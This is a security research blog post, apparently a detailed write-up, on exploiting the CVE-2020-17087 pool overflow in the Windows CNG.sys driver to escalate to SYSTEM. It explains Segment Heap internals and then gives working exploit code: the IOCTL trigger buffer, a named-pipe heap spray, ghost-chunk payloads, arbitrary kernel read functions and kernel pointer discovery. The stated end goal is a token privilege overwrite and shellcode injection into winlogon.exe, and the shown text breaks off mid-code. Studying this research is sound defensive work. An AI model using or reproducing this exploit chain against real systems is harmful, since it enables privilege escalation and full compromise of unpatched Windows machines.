CVE-2020-17087: Exploiting the CNG.sys IOCTL 0x390400 Pool Overflow Vulnerability


CVE-2020-17087 is a pool overflow vulnerability in Windows CNG.sys driver that was discovered to be exploited in the wild [1]. Although there have been root-cause analyses of the vulnerability, its exploitation technique is still relatively unknown. The most notable information was the disclosure by Google Project Zero (GP0) that the ITW sample "uses the buffer overflow to establish an arbitrary read / write primitive in the kernel space with the help of Named Pipe objects" [2].

In this blog post, we describe how this vulnerability could be exploited based on the BlockSize attack method of the Windows 10 Segment Heap [5].

This exploit was developed on Windows 10 20H2, and tested from 1903 to 20H2.

Technical Details

As described in the GP0 issue tracker [1], the root cause can be found in the function cng!CfgAdtpFormatProeprtyBlock, where the requested buffer is transformed to a space-separated hex representation in Unicode, hence the requested size SrcLen is multiplied by 6 to obtain the output buffer size. However, the size fed into cng!BCryptAlloc is incorrectly truncated to 16-bit. When srcLen exceeds 0x10000 / 6, the allocation would result in a smaller buffer and subsequently overflown during the string translation.

Notes on Windows 10 Segment Heap Pool Overflow

Before we start, it is worthwhile to highlight these relevant Segment Heap information [3][4], exploitation techniques [5][6][7] and our notes. If you are familiar, feel free to jump to the next section.

Segment Heap front end: The NonPagedPoolNx allocations are from nt!ExAllocatePoolWithTag by calling the ntoskrnl internal function nt!ExAllocateHeapPool, which then calls respective front-end allocation routines depending on the size requested, either through LFH or VS Allocation, if the requests can be satisfied. For larger blocks it will go to Block Allocation via nt!RtlpHpLargeAlloc. When there is not enough in the Front End allocator, a new Subsegment is requested by calling nt!RtlpHpSegAlloc to the Backend Allocator. Low Fragmentation Heap (LFH) is for frequently used chunk sizes less than 0x200 bytes, they are allocated via RtlpHpLfhContextAllocate from a LFH Subsegment; Variable Size (VS) allocations are for chunks of size in [0x200, 0xFE0] and (0xFE0, 0x20000] that are not page aligned (size & 0xFFF != 0) and they are allocated via RtlpHpVsContextAllocateInternal from a VS Subsegment.

In general, LFH involves smaller chunks and is catering frequently used chunk sizes across the entire kernel, so it is more challenging to control and do layout. With constraints from the vulnerability and attack methods available, we choose to use VS allocator for the exploit.

Guard Pages: During experimenting the pool layout, we have encountered inaccessible pages around every 0x10 pages. But the vulnerability request at least a 64KB "runway" to complete the overflow. This at first makes exploitation looks impossible. As from [4], "When VS subsegments, LFH subsegments and large blocks are allocated, a guard page is added at the end of the subsegment / block. For VS and LFH subsegments, the subsegment size should be >= 64KB for a guard page to be added. The guard page prevents a sequential overflow from VS blocks, LFH blocks and large blocks from corrupting adjacent data outside the subsegment (for VS / LFH blocks) or outside the block (for large blocks)". After more careful reading and experiments, we've found that the subsegment size can actually range from 64KB to 256KB, as also noted in [5]. By reversing relevant functions in ntoskrnl like nt!RtlpHpSegAlloc and nt!RtlpHpVsSubsegmentCreate, we find the only possible size is 128KB (0x20000) for this exploit to work. For example, by requesting a VS chunk of size around 11 pages (0xae70), we can get a new subsegment with 23 pages (92KB) of usable space.

Pool Header attacks: The CTF challenges [6][7] are designed to use a planted vulnerability which normally has better characteristics, and it turns out they are not close to this particular bug. The two attacks described in the SSTIC paper [5] are however quite close, namely, the PoolType attack (CacheAligned) and the BlockSize attack. Due to the unique overwriting pattern of this bug being "XX 00 XX 00 20 00", only the BlockSize byte can be controlled to a few limited values as this byte is on an even address and the odd bytes are not controllable:

Breakpoint 0 hit
fffff803`3fd524aa e83549faff      call    cng!BCryptAlloc (fffff803`3fcf6de4)

1: kd> dt nt!_POOL_HEADER rax-10
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00110111 (0x37)		; 0x37 << 4 = 0x370 bytes
   +0x002 PoolType         : 0y00000010 (0x2)		; NonPagedPoolMustSucceed
   +0x000 Ulong1           : 0x2370000
   +0x004 PoolTag          : 0x62676e43			    ; "Cngb"
   +0x008 ProcessBilled    : 0xffff9d88`074b3b49 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x3b49
   +0x00a PoolTagHash      : 0x74b

Dynamic Lookaside: "Freed chunk of size between 0x200 and 0xF80 bytes can be temporarily stored in a lookaside list in order to provide fast allocation. While they are in the lookaside these chunks won't go through their respective backend free mechanism." A neat technique is described in the SSTIC paper [5] on enabling the dynamic lookaside for a particular VS chunk sizes. This is a crucial part of the BlockSize attack and the PoolType attack. In short, the provided algorithm is able to tweak the Balance Set Manager and the dynamic lookaside, such that the most used chunk sizes since last rebalance are enabled. This would allow reliable free and reallocation of the same chunk, even when this chunk has a corrupted VS chunk header, as the chunk only goes to the dynamic lookaside temporarily (i.e., not really freed by the backend, hence avoiding a BSOD). In this exploit, this would enable us to convert the limited pool overflow into a controlled pool overflow using a size-changed "ghost chunk"; searching for the corrupted chunk by repeatedly freeing and allocating back chunks from an array; and implementing an arbitrary decrement primitive with the Quota Process Pointer Overwrite attack.

Named Pipe spray: For NonPagedPoolNx allocations, Named Pipe is a well-documented technique to spray controlled data, it can also be used to build arbitrary read primitive. We can create a pair of Named Pipe handles for read and write with CreatePipe, which would create an _NP_CCB and an _NP_FCB object, they are linked to the Named Pipe FileObject from the process handle table and are linked to DataQueue object of _NP_DATA_QUEUE. An _NP_DATA_QUEUE_ENTRY object is allocated and place into the DataQueue when data is written to the Named Pipe write handle with WriteFile. The _NP_DATA_QUEUE_ENTRY object has a 0x30 bytes header and additional buffered data, which can be fully controlled (it's referred to as struct PipeQueueEntry in [3]). The exact working mechanism can be referenced with the ReactOS source on npfs and reverse engineering of relevant functions in npfs.sys. The key relevant functions are NpAddDataQueueEntry, NpRemoveDataQueueEntry, NpPeek, NpInternalRead etc.

There are two main use of _NP_DATA_QUEUE_ENTRY objects in this exploit. By overwriting both fields _NP_DATA_QUEUE_ENTRY.{QuotaInEntry, DataSize} to larger values, we can read out-of-bound using PeekNamedPipe to leak the DataQueue pointer of the next DQE object. Secondly, by writing the leaked DataQueue pointer to the next block (we need a valid queue pointer to avoid a BSOD), and changing the DataEntryType from 0 (Buffered) to 1 (Unbuffered), we can change the DQE object to Unbuffered mode, which uses the Irp pointer as the data source. By pointing Irp to a user-mode fake _IRP structure, we can reset the AssociatedIrp.SystemBuffer pointer in user-mode before each read request, thereby we can build an arbitrary read primitive.

struct _NP_DATA_QUEUE_ENTRY {		// Let's call this DQE for short
  +0x00  LIST_ENTRY	QueueEntry;
  +0x10  PIRP		Irp;			// For Unbuffered and AAR primitive
  +0x18  PSECURITY_CLIENT_CONTEXT	ClientSecurityContext;
  +0x20  ULONG		DataEntryType;	// Buffered 0, Unbuffered 1
  +0x24  ULONG		QuotaInEntry;	// Overwrite to get AAR
  +0x28  ULONG		DataSize;		// Overwrite to get AAR
struct _NP_DATA_QUEUE {
    LIST_ENTRY Queue;				// points back to _NP_DATA_QUEUE_ENTRY
    ULONG QueueState;				// 1 (WriteEntries)
    ULONG BytesInQueue;
    ULONG EntriesInQueue;
    ULONG QuotaUsed;
    ULONG ByteOffset;
    ULONG Quota;
struct _NP_CCB;						// Named Pipe Client Control Block
struct _NP_FCB;						// Named Pipe File Control Block

Quota Process Pointer Overwrite: When a chunk has PoolQuota bit (0x8) set in _POOL_HEADER.PoolType, the ProcessBilled field is linked to the _EPROCESS structure of the owning process. Allocation and free of chunks with quota statistics lead to increments or decrements in the EPROCESS_QUOTA_BLOCK pointed to by _EPROCESS.QuotaBlock. Once we gained the ability to overwrite the ProcessBilled field we can craft an arbitrary decrement primitive with a crafted QuotaBlock pointer. Note that due to changes across the builds of Windows 10 the data structures may have changed over time, and this method could have side effects depending on the field values in the process Token. The method requires an arbitrary read to leak the chunk address and the nt!ExpPoolQuotaCookie value in order to encode a _EPROCESS pointer which has a crafted QuotaBlock pointer that points near to the Token.Privileges field.

Exploitation Conditions

During exploiting the vulnerability, we note that there are some unique conditions that makes the exploitation different from the typical pool overflows:

  1. The overflow allows variable length of overwrites, of [0x10000, 0x5FFFA] bytes.
  2. The overflown buffer is allocated from NonPagedPoolNx, of controllable size of [0x2, 0xFFFF] bytes.
  3. The overwritten content format is XX 00 XX 00 20 00, XX in [0x30-0x39, 0x61-0x66].

While (1) and (2) gives some flexibility in the potential range of objects we can overwrite, and the possible layout we can have, (3) in fact makes the exploitation quite challenging, because both the content and offset to overwrite become quite restrictive. This limits the choices of layout, objects and attack method for the 1903-20H2 Segment Heap.

Exploitation Strategy

The steps of exploitation on Windows 10 x64 20H1 is briefly outlined below. We use the following terms, 'g' for groups, the large chunk pattern of the spray; 'd' for dummy, the assisting allocations in order to form groups; target chunks are for the expected chunk to be overwritten; hole chunks are positioned so that the vulnerable CNG.sys buffer gets allocated into the layout; fill chunks are used to stabilize the hole chunks.

  1. Spray groups: Allocate subsegments of 23 pages such that each subsegment contains a group 3 chunk 'g3' (1 page), a group 1 chunk 'g1' (10 pages), and 12 pages of free space at the end of the subsegment. It's done by the following steps: a. Allocate VS subsegments of 23 pages by requesting two 'd1' VS chunks of 11 pages each. b. Free every two 'd1' chunks to get a free subsegment. Allocate a VS chunk 'd2' (12 pages), which would start from the 2nd page of the subsegment. Allocate a VS chunk 'd3' (10 pages) after 'd2' to occupy the free space. c. Free all 'd2' chunks to get holes of 12 pages and allocate group 1 chunks 'g1' (10 pages). d. Free all 'd3' chunks (10 pages) to get free space of 12 pages at each subsegment end.
  2. Spray targets: Allocate target VS chunks (BlockSize 0x3E0) to fill the last 12 pages of each subsegment.
  3. Create holes: Free all 'g1' chunks to get continuous 10 free pages. Allocate hole chunks (BlockSize 0x7F0), they would be aligned to the start of each page of the 'g1' chunk. Allocate fill chunks (BlockSize 0x7B0) which will fill the remaining space after each hole chunk on its page. For the last 2/3 of the hole chunks, free one chunk for every 0x10 allocations.
  4. Trigger CNG bug: trigger the vulnerability via DeviceIoControl with dwIoControlCode = 0x390400 and requested size 0x2BF9, an actual request of 0x7D6 bytes is made and is expected to fall into one of the holes created in step 4. The content translation would write 0x107D6 bytes into the CNG buffer, starting from offset 0x10 of one of the g1 pages and overwriting 0x10 pages and another 0x7D6 bytes, this would stop right before offset 0x7E6 of one of the g2 pages in step 1, and 2. We overwrite the _POOL_TYPE.BlockSize field of the 3rd target chunk of the page into 0x64. We refer this chunk as the ghost chunk, whose size is changed from 0x3E0 to 0x640.
  5. Locate ghost chunk: Enable dynamic lookaside for the ghost chunk size (0x640) and the target chunk size (0x3E0). We can now search the last overwritten target chunk backwards from the last target chunk handle. In each iteration, we free one target chunk and immediately allocate a 0x640 chunk: if the correct ghost (target) chunk gets freed, the 0x640 allocation would go back to the exact same address thanks to the lookaside, therefore resulting in a controlled linear pool overflow, and this can be detected by calling PeekNamedPipe on the adjacent target chunk handle.
  6. Leak a valid root queue pointer: Once the ghost chunk is found, the QuotaInEntry and DataSize fields of the adjacent target chunk T are overwritten to large values with the linear pool overflow. We can use PeekNamedPipe again to leak a valid root queue pointer.
  7. Arbitrary read primitive: With the leaked root queue, we can change the ghost chunk data and invoke the linear pool overflow the 2nd time, to overwrite the target chunk T with valid root queue pointers, an IRP pointer crafted from userland, a changed DataEntryType from Buffered to Unbuffered. Now by altering the data pointer of IRP in userland, we can achieve arbitrary read.
  8. Leak pointers for next step: First from the earlier leaked root queue pointer, we can find the base address of NPFS.sys. From npfs_base we compute three variables nt!ExpPoolQuotaCookie, nt!RtlpHpHeapGlobals and nt!PsInitialSystemProcess. Next leak the _EPROCESS pointer for self process and for winlogon.exe, and the the address of the self process token.
  9. Preparation for arbitrary decrements: First leak the VS Subsegment address: the arbitrary decrement depends on freeing a chunk with a crafted ProcessBilled pointer. We need to fix the VS chunk header because the chunk is not immediately reclaimed, a corrupted VS chunk header would lead to immediate BSOD. Second, construct 2-3 fake _EPROCESS whose QuotaBlock pointers are crafted to point to different byte offsets in Token.Privileges. The LPE requires two decrements and the DLL versions require 3 decrements due to the initialized privilege level differences.
  10. Perform decrements: For the LPE, two decrements are required at Token+0x40 and Token+0x48. For the DLL version, three required: Token+0x4B, Token+0x44, and Token+0x3D. Each decrement is done by invoking the ghost chunk linear pool overflow one time: set new ProcessBilled pointer, fix the original root queue pointer of the target chunk T, and finally free T and quickly reclaim it back.
  11. Spawn SYSTEM shell: If step 10 is successful, bit 20 in Token.Privileges would be flipped and the SeDebugPrivilege is obtained in both Privileges.Present and Privileges.Enabled. Shellcode can be injected into winlogon.exe to obtain a SYSTEM shell.
1. Spray groups

Due to the unique requirement of the vulnerability, there are more than 64KB written to the CNG output buffer. And due to the properties of Segment Heap, normally each VS Subsegment is no more than 64KB and is guarded by an inaccessible page before and after the subsegment. The idea is to request a sufficiently large VS request so that more than 64KB is allocated. Additionally we want the allocations to be in two big groups (g2 and g3), so that the hole chunks are in the first group and the target chunks are in the second group. Ideally each of the two groups should be 0x10 pages each, so that no matter which hole is occupied by the CNG buffer, the resulted overflow is guaranteed to overwrite one target chunk at a desired offset, yet not hitting the guard page out-of-bound.

; Windows 10 20H1 19041.572

.text:00000001C00624A7                 movzx   ecx, di         ; NumberOfBytes
.text:00000001C00624AA                 call    BCryptAlloc     ; truncated
.text:00000001C00624AF                 mov     rdx, rax

bu /p ffff9c833549f080 !cng + 624AA

PAGE:00000001C000D571                 mov     edx, edx        ; NumberOfBytes
PAGE:00000001C000D573                 mov     ecx, 308h       ; PoolType
PAGE:00000001C000D578                 mov     r8d, 7246704Eh  ; Tag 'NpFr'
PAGE:00000001C000D57E                 call    cs:__imp_ExAllocatePoolWithQuotaTag
PAGE:00000001C000D585                 nop     dword ptr [rax+rax+00h]

bu /p ffff9c833549f080 !npfs + D58A ".printf \"[+] Allocated %x bytes DataEntry at %p\\n\",r13, rax; g"

.text:00000001402C7C36                 call    RtlpHpVsSubsegmentCreate
.text:00000001402C7C3B                 mov     rsi, rax

bu /p ffff9c833549f080 !nt + 2C7C3B ".printf \"[+] RtlpHpVsSubsegmentCreate(req=%x): alloc %p size %x \\n\",r13,rax,poi(rax+20)&0xffff; g"

The idea is to allocate two d1 VS chunks of close to 11 pages, this would result in a 23 pages new subsegment; then free the two d1 chunks and request for a 12 pages d2 chunk and 10 pages d2 chunk. This will ensure the order that d2 would be at the start of the subsegment.

[+] RtlpHpVsSubsegmentCreate(req=ae70): alloc ffff8d8f57fc5000 size 1ffd
[+] Allocated ae40 bytes DataEntry at ffff8d8f57fc6000
[+] Allocated ae40 bytes DataEntry at ffff8d8f57fd1000
[+] RtlpHpVsSubsegmentCreate(req=be70): alloc ffff8d8f57fc5000 size 1ffd
[+] Allocated be40 bytes DataEntry at ffff8d8f57fc6000
[+] Allocated 9e30 bytes DataEntry at ffff8d8f57fd2000

As far as the current analysis goes, we can not create subsegment larger than 128KB yet. Relevant code for allocating subsegment larger than 64KB:

void __fastcall ExAllocateHeapPool(unsigned int PoolType, SIZE_T NumberOfBytes, ULONG Tag, ULONG_PTR BugCheckParameter2, char a5)
    // ...
    // RtlpHpLargeAlloc() for larger than 0x20000
    if ( _size > 0x20000 ) {
      JUMPOUT(_size, *(unsigned int *)(v16 + 464), sub_1404675B9);
      v78 = RtlpHpLargeAlloc(v16, _size, _size, v54);
      v56 = v78;
    else {
      // Use VsContext for <= 0x20000
      a6 = 0;
      v98 = 0i64;
      *(_OWORD *)a5a = 0i64;
      // One of system 0x20000 goes through here, when reqested 0x9070
      v56 = (__int64)RtlpHpVsContextAllocateInternal(// goes to VsContext allocator!
                       (_HEAP_VS_CONTEXT *)(v16 + 0x280),
      // ...
    // ...

The final layout of the 23 pages subsegment looks like follows:

[guard][g3,1P][------- g1, 10P --------][----- free space of 12P -----][guard]
2. Spray target chunks

This step is to fill the 12 pages of free space after g1 with target chunks.

target_pipes  = prepare_pipe(0x3D0, spray_cnt * 12 * 4 / 10, 'T', 20);

On each of the 12 pages, 4 target chunks will be allocated, and aligned at similar offsets, with their chunk _POOL_HEADER starting at 0x000, 0x3F0, 0x7E0, 0xBD0 respectively. We are expecting the ghost chunk to be at 0x7E0 of a page, and the target chunk T following it at 0xBD0. As illustrated below:

ffffd20a`a3f797d0  9e15ce1a de4a7ff9 0000000e ffffd20a  ......J.........
ffffd20a`a3f797e0  0a3e9f00 7246704e 6cbebe8c 0e5b280c  ..>.NpFr...l.([.
ffffd20a`a3f797f0  9092a4b8 ffff870e 9092a4b8 ffff870e  ................
ffffd20a`a3f79800  00000000 00000000 909cfa00 ffff870e  ................
ffffd20a`a3f79810  00000000 000003a0 000003a0 44444444  ............DDDD
ffffd20a`a3f79820  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT

ffffd20a`a3f79bc0  9e15c20a de4a7ff9 0000001e ffffd20a  ......J.........
ffffd20a`a3f79bd0  0a3e9f00 7246704e 6cbeb2bc 0e5b280c  ..>.NpFr...l.([.
ffffd20a`a3f79be0  9092a878 ffff870e 9092a878 ffff870e  x.......x.......
ffffd20a`a3f79bf0  00000000 00000000 909cfdc0 ffff870e  ................
ffffd20a`a3f79c00  00000000 000003a0 000003a0 44444444  ............DDDD
ffffd20a`a3f79c10  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT
3. Create holes

Now we can free all the g1 chunks to get continuous free space of 10 pages. And allocate hole chunks (0x7F0 bytes). As each page can not hold two hole chunks, they are expected to be allocated to the start of the each page in each free page. After allocating all hole checks, allocate fill chunks (0x7B0 bytes) to occupy the free space after each hole chunk. Finally we free one hole for every 0x10 allocations to get roughly one hole per subsegment, for the last 2/3 of the subsegments created.

  hole_pipes = prepare_pipe(0x800 - 0x40, spray_cnt, 'H', 0);	// 0x7f0 chunk
  fill_pipes = prepare_pipe(0x7D0 - 0x40, spray_cnt, 'F', 0);	// 0x7b0 chunk
  close_all_pipe_from_idx(g1_pipes, 0);
  create_holes_from(hole_pipes, spray_cnt / 3);

From this spray layout, we expect each hole chunk to start at the beginning of a page.

4. Trigger the vulnerability in CNG

Now we are ready to trigger the vulnerability and the CNG output buffer is expected to fall into one of the holes just created.

  CONST DWORD DataBufferSize = 0x2BF9;		// overwrites 0x2BF9 * 6 = 0x107D6 bytes, till 0x107E6

  CONST DWORD IoctlSize = 4096 + DataBufferSize;
  BYTE *IoctlData = (BYTE *)HeapAlloc(GetProcessHeap(), 0, IoctlSize);

  RtlZeroMemory(IoctlData, IoctlSize);

  *(DWORD*)    &IoctlData[0x00] = 0x1A2B3C4D;
  *(DWORD*)    &IoctlData[0x04] = 0x10400;
  *(DWORD*)    &IoctlData[0x08] = 1;
  *(ULONGLONG*)&IoctlData[0x10] = 0x100;
  *(DWORD*)    &IoctlData[0x18] = 3;
  *(ULONGLONG*)&IoctlData[0x20] = 0x200;
  *(ULONGLONG*)&IoctlData[0x28] = 0x300;
  *(ULONGLONG*)&IoctlData[0x30] = 0x400;
  *(DWORD*)    &IoctlData[0x38] = 0;
  *(ULONGLONG*)&IoctlData[0x40] = 0x500;
  *(ULONGLONG*)&IoctlData[0x48] = 0x600;
  *(DWORD*)    &IoctlData[0x50] = DataBufferSize; // OVERFLOW
  *(ULONGLONG*)&IoctlData[0x58] = 0x1000;
  *(ULONGLONG*)&IoctlData[0x60] = 0;
  RtlCopyMemory(&IoctlData[0x200], L"FUNCTION", 0x12);
  RtlCopyMemory(&IoctlData[0x400], L"PROPERTY", 0x12);

  memset(IoctlData + 0x1000 + DataBufferSize - 0x2, '\xdd', 0x2);	// write 0x64 as BS

  ULONG_PTR OutputBuffer = 0;
  DWORD BytesReturned;
  BOOL Status = DeviceIoControl(

After the overwrite, one of the target chunks at the desired offset gets overwritten with 6 bytes at 0x7E6:

1: kd> gu
fffff803`65351e39 85c0            test    eax,eax
1: kd> dc ffffd20a`a3f797d0
ffffd20a`a3f797d0  00200030 00300030 00640020 00200064  0. .0.0. .d.d. .
ffffd20a`a3f797e0  00640064 72460020 6cbebe8c 0e5b280c  d.d. .Fr...l.([.
ffffd20a`a3f797f0  9092a4b8 ffff870e 9092a4b8 ffff870e  ................
ffffd20a`a3f79800  00000000 00000000 909cfa00 ffff870e  ................
ffffd20a`a3f79810  00000000 000003a0 000003a0 44444444  ............DDDD
ffffd20a`a3f79820  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT
ffffd20a`a3f79830  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT
ffffd20a`a3f79840  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT

The chunk has its BlockSize overwritten to 0x64, from previous 0x3E. The other 5 neighboring bytes overwritten are either unused or do not matter. We refer this chunk as the ghost chunk since its size increased to overlap the next target chunk T:

ffffd20a`a3f79bc0  9e15c20a de4a7ff9 0000001e ffffd20a  ......J.........
ffffd20a`a3f79bd0  0a3e9f00 7246704e 6cbeb2bc 0e5b280c  ..>.NpFr...l.([.
ffffd20a`a3f79be0  9092a878 ffff870e 9092a878 ffff870e  x.......x.......
ffffd20a`a3f79bf0  00000000 00000000 909cfdc0 ffff870e  ................
ffffd20a`a3f79c00  00000000 000003a0 000003a0 44444444  ............DDDD
ffffd20a`a3f79c10  54545454 54545454 54545454 54545454  TTTTTTTTTTTTTTTT

By freeing the ghost chunk and allocating it back again, we can write 0x640 - 0x3E0 = 0x260 bytes of arbitrary data into the target chunk T. Effectively converting the single byte overwrite on BlockSize into a controlled linear pool overflow. And this primitive can be invoked repeatedly, allowing us to build more powerful primitives.

5. Locate the ghost chunk

Assuming the later sprayed target chunks are sequentially allocated, we can search backwards on the target chunk handles to locate the ghost chunk. The idea is to free one target chunk with its handle, then allocate it back immediately, followed by a test on the adjacent target chunk on whether a linear pool overflow has taken place. By searching backwards, we ensure if a freed target chunk is not the ghost, it gets allocated back immediately.

lookaside_t *ghost_lookaside = prepare_lookaside(0x640);
lookaside_t *target_lookaside = prepare_lookaside(0x3E0);
enable_lookaside(2, ghost_lookaside, target_lookaside);

With the help of the dynamic lookaside list, the freed ghost chunk (BlockSize 0x64) will not go back to the normal free mechanism, avoiding a BSOD as its VS chunk header is corrupted:

1: kd> dc ffffd20a`a3f797d0
ffffd20a`a3f797d0  00200030 00300030 00640020 00200064  0. .0.0. .d.d. . // VS header
ffffd20a`a3f797e0  00640064 72460020 6cbebe8c 0e5b280c  d.d. .Fr...l.([.

Note we can not search sequentially forward because there are around 64KB corrupted chunks between the CNG buffer and the ghost chunk, accidentally freeing any of them would result in immediate BSOD. We construct the ghost chunk payload as follow, note the root queue pointers are invalid. We need to stop the search as soon as the target chunk T is found, as freeing a DQE object with invalid root queue leads to immediate BSOD.

// craft ghost chunk data in ghost_pipes->payload
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00) = 0xdeadbeef;// leak_root_queue
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08) = 0xdeadbeef;// leak_root_queue
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10) = 0xdeadbeef;// Irp
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x18) = 0;// Security Context
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20) = 0;// Type: Unbuffered
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x24) = 0xFFFFFFFF;// QuotaInEntry
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x28) = 0xFFFFFFFF;// DataSize
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30) = 0x67676767;// Buf[]: "gggg"

We can now start the searching:

  _LOG(output, "[*] Searching for overwritten target chunk\n");
  for (ghost_idx = target_pipes->cnt - 2; ghost_idx >= 0; ghost_idx --)
    BYTE buf[0x10] = { 0 };

    create_hole_at(target_pipes, ghost_idx);		// free DataEntry T[i]
    fill_hole_at(ghost_pipes, ghost_idx);			// alloc ghost chunk
    peek_data(target_pipes, ghost_idx + 1, buf, 8);
    if ( *(UINT32*)buf == 0x67676767 ) {			// found "gggg"
      aar_index = ghost_idx + 1;
      aar_pipes = target_pipes;
      _LOG(output, "[+] Target chunk at: index 0x%X, handle 0x%llX\n",
           aar_index, (UINT64)target_pipes->writePipe[aar_index]);
    fill_hole_at(target_pipes, ghost_idx);			// refill T[i]
6. Leak a valid root queue pointer

When the ghost chunk is found, the adjacent target chunk T is overwritten with control data, including the DataSize and QuotaInEntry being modified to 0xFFFFFFFF. As already used when testing the overwrite in the searching in previous step, we can leak a large number of data with PeekNamedPipe. Reading past the end of the target chunk T to next page, we can get a valid root queue pointer.

  BYTE leak[0x480] = { 0 };
  if ( !peek_data(target_pipes, aar_index, leak, sizeof(leak)) ) exp_failed();

  if (*(UINT32*)(leak + 0x430 - 0x8) != 0x3A0) {
    _LOG(output, "[-] Failed to locate next target chunk of size 0x3a0\n");
  leak_root_queue = *(UINT64*)(leak + 0x430 - 0x30);
  target_pool_hdr = *(UINT64*)(leak + 0x430 - 0x30 - 0x10);
  _LOG(output, "[+] Leaked Queue Ptr at\t: 0x%p\n", leak_root_queue);
7. Build an AAR primitive

We can now invoke the controlled linear pool overflow again by freeing the ghost chunk and allocating it back, this time we can set the root queue pointer to the valid pointer just leaked, meanwhile we set the IRP pointer to a crafted IRP object in the user space, and set the DataEntryType to 1 (Unbuffered). The updated target chunk T can now be used as an arbitrary address read (AAR) primitive.

typedef struct pipe_queue_entry_sub {
    UINT64 unk;
    UINT64 unk1;
    UINT64 unk2;
    UINT64 data_ptr;		// AssociatedIrp.SystemBuffer
} pipe_queue_entry_sub_t;

pipe_queue_entry_sub_t * fake_pipe_queue_sub;
fake_pipe_queue_sub = (pipe_queue_entry_sub_t *)malloc(sizeof(pipe_queue_entry_sub_t));
memset(fake_pipe_queue_sub, 0, sizeof(pipe_queue_entry_sub_t));

// update the ghost chunk, fix _POOL_HEADER
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x00)= leak_root_queue; // QE.Flink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x08)= leak_root_queue; // QE.Blink
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30+0x10)= (UINT64) fake_pipe_queue_sub;
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x20)= 1; // Bufferred
*(UINT64*)(ghost_pipes->payload+0x3F0-0x30-0x08)=0; // Clear ProcessBilled
*(UINT8*) (ghost_pipes->payload+0x3F0-0x30-0x10+0x3)=0x2; // Clear Quota bit
*(UINT32*)(ghost_pipes->payload+0x3F0-0x30+0x30)=0x6b61656c; // Buf[]: "leak"

create_hole_at(ghost_pipes, ghost_idx);  // free ghost chunk
fill_hole_at(ghost_pipes, ghost_idx);	 // rewrite ghost chunk "GGG0"
current_pipe_offset = 0;

We can now use these two functions to perform AAR of 4/8 or more bytes:

void arb_read_bytes(UINT64 where, int size, BYTE* readbuf)
    fake_pipe_queue_sub->data_ptr = where;
    peek_data(aar_pipes, aar_index, readbuf, size);
    current_pipe_offset += size;

UINT64 arb_read(UINT64 where, int size)
    BYTE readbuf[0x100] = { 0 };
    fake_pipe_queue_sub->data_ptr = where;
    peek_data(aar_pipes, aar_index, readbuf, size);
    current_pipe_offset += size;
    return size > 4 ? *(UINT64*)readbuf : *(UINT32*)readbuf;
8. Leak pointers and variables

With the AAR, we have the leaked root queue pointer as a starting point, we can leak the pointers and variables needed in this exploit. This step references the work and sample code in [3], and requires some reversing into the actual data structures on _NP_CCB (Named Pipe Client Control Block) and _NP_FCB (Named Pipe File Control Block).

From the leaked root queue pointer, we can find linked file object, subsequently the device object and the driver object. From the driver object pointer we can get the function pointer NpFsdCreate. Though still depending on the exact version of NPFS.sys, this offset is relatively stable across a build of Windows 10, we can derive the base address !npfs. In the final version we use backward search of the PE header from the pointer NpFsdCreate by calling get_pe_base.

By trial-and-error, we've found two ntoskrnl functions that are imported by npfs, which has direct references to the variables and pointer we need for ntoskrnl. We use find_nt_variables to extract their actual address in memory. This is a generic method as ntoskrnl has many different binary releases from 1903 to 20H2. By parsing the binary from the import functions ExFreePoolWithTag and ExAllocatePoolWithQuotaTag, we can derive the addresses of nt!RtlpHpHeapGlobals, which is referenced when encoding / decoding the _HEAP_VS_CHUNK_HEADER, nt!ExpPoolQuotaCookie, which is later used to encode the ProcessBilled pointer in _POOL_HEADER, nt!PsInitialSystemProcess, which is needed to traverse the active processes to find self process and winlogon.exe _EPROCESS pointers. The search is implemented by find_address(UINT64 start, BYTE* opcode, BYTE* before, BYTE* after) with the start address to search, the opcode patterns before and after the address to search. As the memory management code are relatively stable across different ntoskrnl binaries, this is expect to work as generic for Windows 10. The algorithm may need adjustments when testing a different build that fails at this step.

/* PsInitialSystemProcess - npfs imported ExAllocatePoolWithQuotaTag+0x36
 * ExpPoolQuotaCookie - npfs imported ExAllocatePoolWithQuotaTag+0x90
 * RtlpHpHeapGlobals - npfs imported ExFreeHeapPool+{0xC2,0xBD}: {20Hx,190x}
BOOL find_nt_variables(UINT64 npfs_base_addr)
  UINT64 ExAllocatePoolWithQuotaTag, ExFreePoolWithTag, ExFreeHeapPool;
  UINT64 ExAllocatePoolWithQuotaTag_ptr, ExFreePoolWithTag_ptr;

  ExFreePoolWithTag_ptr = npfs_base_addr + off_Npfs_ExFreePoolWithTag;
  ExAllocatePoolWithQuotaTag_ptr = npfs_base_addr + off_Npfs_ExAllocatePoolWithQuotaTag;

  ExAllocatePoolWithQuotaTag = arb_read(ExAllocatePoolWithQuotaTag_ptr, 0x8);
  ExFreePoolWithTag = arb_read(ExFreePoolWithTag_ptr, 0x8);
    48 83 EC 28             sub     rsp, 28h
    E8 97 7A CD FF          call    ExFreeHeapPool
    48 83 C4 28             add     rsp, 28h
  ExFreeHeapPool = find_address(ExFreePoolWithTag, "\xE8",
          "\x48\x83\xEC\x28", "\x48\x83\xC4\x28");
    48 8D 04 49             lea     rax, [rcx+rcx*2]
    48 33 1D BC 1B 3F 00    xor     rbx, cs:RtlpHpHeapGlobals
    48 33 DF                xor     rbx, rdi
    48 C1 E0 06             shl     rax, 6
  RtlpHpHeapGlobals_ptr = find_address(ExFreeHeapPool + 0xBD - 0x10,
